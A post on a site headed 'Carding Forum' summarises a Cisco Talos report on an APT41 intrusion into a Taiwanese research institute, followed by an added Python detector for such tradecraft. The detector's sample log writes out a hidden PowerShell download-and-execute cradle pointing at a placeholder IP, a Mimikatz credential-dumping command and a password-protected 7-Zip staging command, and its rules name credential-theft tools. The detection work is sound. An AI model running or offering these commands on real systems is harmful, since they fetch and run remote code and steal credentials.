Carding Forum
Cyber spies used sophisticated disguise schemes to hide their actions.
A government-affiliated research institute in Taiwan has fallen victim to a cyberattack identified by Cisco Talos. The attack, which occurred in July 2023, infected the institute's systems with the ShadowPad and Cobalt Strike malware. Experts attribute this campaign to the hacker group APT41, which, according to the US authorities, has ties to China.
Cisco Talos detected abnormal PowerShell commands connecting to an IP address to download and execute scripts. The ShadowPad malware used a vulnerable, outdated version of the Microsoft Office IME binary to launch its loader. APT41 also built a special loader to exploit CVE-2018-0824, a vulnerability that allows local privilege escalation.
The researchers note that the methods and tools used match those typical of APT41, including the use of ShadowPad, Bitdefender and FileZilla. Although the final ShadowPad payload was not recovered, it is known that ShadowPad is used exclusively by Chinese hacker groups.
The Cobalt Strike beacon detected during the attack was deployed with a loader built on CS-Avoid-Killing, a loader designed to evade detection by antivirus programs. The loader is written in Go and contains strings in simplified Chinese, which confirms the involvement of Chinese hackers.
During the attack, the attackers compromised three hosts in the target network and were able to exfiltrate valuable documents. The hackers installed web shells and used RDP and reverse shells to spread malware within the network.
APT41 also used credential harvesting tools, including Mimikatz and WebBrowserPassView. The hackers executed commands to collect information about users, directory structures, and network configurations. To exfiltrate the data, the criminals compressed and encrypted the files using 7-Zip and then sent them to the command-and-control server.
During the campaign analysis, two types of ShadowPad loaders were found. The first used an old version of the Microsoft Office IME; the second was built on a vulnerable Bitdefender library. Both types of loaders abused legitimate binaries to run malicious code.
The investigation also identified tools used by the hackers, including UnmarshalPwn to exploit CVE-2018-0824, as well as infrastructure components shared with other campaigns by the same group.
The increasing complexity of APT41's methods and tools signals a growing threat to organizations around the world. This incident highlights the critical need for companies and institutions to continually improve their cybersecurity defenses, regularly update software, and conduct vulnerability audits.
Source
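As an added example that is not part of the original post or of Cisco Talos's report, the following Python sketch applies the detection ideas described above (anomalous PowerShell download-and-execute commands, credential harvesting tools, 7-Zip archives created with a password, host discovery commands) to constructed process-creation log lines. The log format, host names, user names, IP address and command lines are all made up for illustration, and the regular expressions are generic indicators for those tradecraft classes, not indicators taken from the campaign.

```python
"""
Toy triage of process-creation events for the tradecraft classes named in
the article. Added example, not Cisco Talos's or the original poster's code.
The SAMPLE_LOG below is constructed (format: timestamp,host,user,image,cmd)
and is not the real campaign's telemetry.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    mitre: str  # ATT&CK technique the rule loosely maps to


# Generic indicators for the TTP classes in the article (assumed patterns,
# deliberately loose; tune against your own baseline before deploying).
RULES = [
    # PowerShell fetching a script from a URL and executing it (download cradle)
    Rule("powershell_download_cradle",
         re.compile(r"powershell.*(DownloadString|DownloadFile|Invoke-WebRequest|iwr|IEX)\b.*https?://", re.I),
         "T1059.001"),
    # Mimikatz module syntax or WebBrowserPassView, even if the binary is renamed
    Rule("credential_dumping_tool",
         re.compile(r"\b(mimikatz(\.exe)?|sekurlsa::|WebBrowserPassView(\.exe)?)\b", re.I),
         "T1003 / T1555.003"),
    # 7-Zip 'add' with an inline password: staging an encrypted archive for exfiltration
    Rule("7zip_encrypted_archive",
         re.compile(r"\b7za?(\.exe)?\b.*\ba\b.*\s-p\S+", re.I),
         "T1560.001"),
    # User, system and network reconnaissance commands
    Rule("host_discovery",
         re.compile(r"\b(whoami|net user|net group|ipconfig|systeminfo|dir /s)\b", re.I),
         "T1033 / T1082 / T1016"),
]

# Constructed sample events: one host showing the whole chain, one benign host.
SAMPLE_LOG = """\
2023-07-12T03:14:07Z,WS-01,corp\\jdoe,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
2023-07-12T03:15:40Z,WS-01,corp\\jdoe,C:\\Windows\\System32\\whoami.exe,whoami /all
2023-07-12T03:20:02Z,WS-01,corp\\jdoe,C:\\Users\\Public\\m.exe,m.exe "privilege::debug" "sekurlsa::logonpasswords" exit
2023-07-12T03:41:11Z,WS-01,corp\\jdoe,C:\\Program Files\\7-Zip\\7z.exe,7z.exe a -pS3cret -mhe=on C:\\Users\\Public\\out.7z C:\\Shares\\Research\\
2023-07-12T08:00:00Z,WS-02,corp\\asmith,C:\\Program Files\\7-Zip\\7z.exe,7z.exe x C:\\Users\\asmith\\Downloads\\report.7z
2023-07-12T09:12:33Z,WS-02,corp\\asmith,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,powershell.exe Get-ChildItem C:\\Temp
"""


def parse_line(line: str) -> dict:
    """Split one event into fields; the command line may itself contain commas,
    so only the first four separators are honoured."""
    ts, host, user, image, cmd = line.split(",", 4)
    return {"ts": ts, "host": host, "user": user, "image": image, "cmd": cmd}


def triage(log_text: str) -> list[tuple[str, str, str]]:
    """Return (timestamp, host, rule name) for every event that trips a rule."""
    hits = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        for rule in RULES:
            if rule.pattern.search(ev["cmd"]):
                hits.append((ev["ts"], ev["host"], rule.name))
    return hits


def hosts_with_chain(hits: list[tuple[str, str, str]], min_rules: int = 3) -> list[str]:
    """Hosts that tripped at least `min_rules` distinct rules. A single hit is
    often noise; a cradle plus credential theft plus an encrypted archive on
    the same host is the kind of chain the article describes."""
    by_host: dict[str, set[str]] = {}
    for _, host, name in hits:
        by_host.setdefault(host, set()).add(name)
    return sorted(h for h, names in by_host.items() if len(names) >= min_rules)


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for ts, host, name in found:
        print(f"{ts} {host} {name}")
    print("hosts showing a multi-stage chain:", hosts_with_chain(found))
```

The point of `hosts_with_chain` is that none of these indicators is convincing alone (administrators run `whoami` and create password-protected archives too); correlating several of them on one host within a short window is what turns the article's list of TTPs into something a SOC can act on.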